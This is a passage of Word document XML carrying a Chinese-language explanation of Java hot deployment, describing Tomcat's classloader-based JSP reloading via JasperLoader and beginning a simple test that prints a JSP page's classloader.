        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="005E46FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>热部署原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735619" w:rsidRDefault="009F330C" w:rsidP="00735619">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用程序来说，热部署就是在运行时更新</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类文件。在基于</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的应用服务器实现热部署的过程中，类装入器扮演着重要的角色。大多数基于</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的应用服务器，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EJB</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器和</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>容器，都支持热部署。类装入器不能重新装入一个已经装入的类，但只要使用一个新的类装入器实例，就可以将类再次装入一个正在运行的应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F330C" w:rsidRPr="009F330C" w:rsidRDefault="009F330C" w:rsidP="00735619">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们知道，现在大多数的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器都支持热部署，而对于热部署的实现机制，网上讲的却不够完善，下面我们就</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的热部署实现机制，讲解一下它是如何实现的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F330C" w:rsidRPr="009F330C" w:rsidRDefault="009F330C" w:rsidP="00C74DFC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的容器实现热部署使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>两种机制</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F330C" w:rsidRPr="009F330C" w:rsidRDefault="009F330C" w:rsidP="00C74DFC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  Classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>重写，通过自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加载相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编译后的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F330C" w:rsidRPr="009F330C" w:rsidRDefault="009F330C" w:rsidP="00C74DFC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过动态修改内存中的字节码，将修改过的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>再次装载到</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="009F330C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00247745" w:rsidRPr="00F41A4C" w:rsidRDefault="00247745" w:rsidP="00247745">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00AF3599">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF3599">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidR="00AF3599">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="00AF3599">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidR="00AF3599">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新加载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>org.apache.jasper.servlet.JasperLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>现了对</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的加载，下面做个测试：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>新建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>工程，并编写一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面，在</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面中输出该页面的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader,&lt;%System.out.print(this.getClass().getClassLoader());%&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器，打开</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
